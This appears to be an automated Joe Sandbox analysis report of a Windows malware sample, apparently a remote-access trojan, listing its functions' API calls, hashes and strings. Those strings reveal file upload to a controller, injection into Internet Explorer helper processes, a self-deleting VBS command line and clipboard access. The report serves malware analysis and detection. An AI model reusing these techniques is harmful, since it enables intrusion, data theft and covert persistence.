                                • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                • Opcode Fuzzy Hash: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                                • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                • Sleep.KERNEL32(00000064), ref: 00412E94
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                • String ID: /stext "$0TG$0TG$NG$NG
                                • API String ID: 1223786279-2576077980
                                • Opcode ID: 45816bd423e92bb8680930aa6a7d7804db8f63587a8a1e07c71b8186c8759938
                                • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                • Opcode Fuzzy Hash: 45816bd423e92bb8680930aa6a7d7804db8f63587a8a1e07c71b8186c8759938
                                • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00408B7A Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 328fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                • __aulldiv.LIBCMT ref: 00408D4D
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $hdF$NG
                                • API String ID: 3086580692-1206044436
                                • Opcode ID: 64cefbb928e21c2f7d127ca4721bf1c832eccef9f0ecc8420659d86e10d9b8ce
                                • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                • Opcode Fuzzy Hash: 64cefbb928e21c2f7d127ca4721bf1c832eccef9f0ecc8420659d86e10d9b8ce
                                • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A726 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 163sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32(00001388), ref: 0040A740
                                  • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                  • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                  • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                  • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                • String ID: 8SG$8SG$hdF$pQG$pQG$PG$PG
                                • API String ID: 3795512280-4009011672
                                • Opcode ID: 90f81a8c835b78a509db603d52e056b33c5ce4745e21562e65a9418a5dbb7178
                                • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                • Opcode Fuzzy Hash: 90f81a8c835b78a509db603d52e056b33c5ce4745e21562e65a9418a5dbb7178
                                • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                Download Yara Rule
                                APIs
                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                • GetCursorPos.USER32(?), ref: 0041D5E9
                                • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                • ExitProcess.KERNEL32 ref: 0041D665
                                • CreatePopupMenu.USER32 ref: 0041D66B
                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                • String ID: Close
                                • API String ID: 1657328048-3535843008
                                • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F474 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 210processCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$hdF$hdF$ieinstal.exe$ielowutil.exe
                                • API String ID: 3756808967-3633479162
                                • Opcode ID: 7f89ee10989f3bd4abeff3972d4c872612047b4c43f3230c1fb09e73b354777b
                                • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                • Opcode Fuzzy Hash: 7f89ee10989f3bd4abeff3972d4c872612047b4c43f3230c1fb09e73b354777b
                                • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D7FF Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 148COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                  • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                                  • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                                  • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                • ExitProcess.KERNEL32 ref: 0040D9C4
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$hdF$open
                                • API String ID: 1913171305-51354631
                                • Opcode ID: f258cf52c1f85b39fd526d8af0fa5692be2d229592be5a4268ec070556a5325b
                                • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                • Opcode Fuzzy Hash: f258cf52c1f85b39fd526d8af0fa5692be2d229592be5a4268ec070556a5325b
                                • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004048C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON
                                Download Yara Rule
                                APIs
                                • connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                • WSAGetLastError.WS2_32 ref: 00404A21
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                • API String ID: 994465650-3229884001
                                • Opcode ID: 73075052d8b02f035b309482e82d4e6ffd926ef573fac63689623bdc7e9bf8aa
                                • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                • Opcode Fuzzy Hash: 73075052d8b02f035b309482e82d4e6ffd926ef573fac63689623bdc7e9bf8aa
                                • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 0045130A
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                • _free.LIBCMT ref: 004512FF
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00451321
                                • _free.LIBCMT ref: 00451336
                                • _free.LIBCMT ref: 00451341
                                • _free.LIBCMT ref: 00451363
                                • _free.LIBCMT ref: 00451376
                                • _free.LIBCMT ref: 00451384
                                • _free.LIBCMT ref: 0045138F
                                • _free.LIBCMT ref: 004513C7
                                • _free.LIBCMT ref: 004513CE
                                • _free.LIBCMT ref: 004513EB
                                • _free.LIBCMT ref: 00451403
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID:
                                • API String ID: 161543041-0
                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                                • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                • Opcode Fuzzy Hash: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                                • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                • GetLastError.KERNEL32 ref: 00455CEF
                                • __dosmaperr.LIBCMT ref: 00455CF6
                                • GetFileType.KERNEL32(00000000), ref: 00455D02
                                • GetLastError.KERNEL32 ref: 00455D0C
                                • __dosmaperr.LIBCMT ref: 00455D15
                                • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                • CloseHandle.KERNEL32(?), ref: 00455E7F
                                • GetLastError.KERNEL32 ref: 00455EB1
                                • __dosmaperr.LIBCMT ref: 00455EB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                • String ID: H
                                • API String ID: 4237864984-2852464175
                                • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0$1$2$3$4$5$6$7$VG
                                • API String ID: 0-1861860590
                                • Opcode ID: 41b7ed3079968531247989beadbe1f0bf299f88a528c0936b597c9f8fef39dcf
                                • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                • Opcode Fuzzy Hash: 41b7ed3079968531247989beadbe1f0bf299f88a528c0936b597c9f8fef39dcf
                                • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: \&G$\&G$`&G
                                • API String ID: 269201875-253610517
                                • Opcode ID: 753e5f9e072138fb6cd7009167dc0b4a762ab6b47e26c8bd7c62549e421885b3
                                • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                • Opcode Fuzzy Hash: 753e5f9e072138fb6cd7009167dc0b4a762ab6b47e26c8bd7c62549e421885b3
                                • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                Download Yara Rule
                                APIs
                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: LongNamePath
                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                • API String ID: 82841172-425784914
                                • Opcode ID: 35529518f688bb00822c59c31e380965135d22232495089cf56779e66837349f
                                • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                • Opcode Fuzzy Hash: 35529518f688bb00822c59c31e380965135d22232495089cf56779e66837349f
                                • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00416940 Relevance: 17.5, APIs: 8, Strings: 2, Instructions: 46clipboardCOMMON
                                Download Yara Rule
                                APIs
                                • OpenClipboard.USER32 ref: 00416941
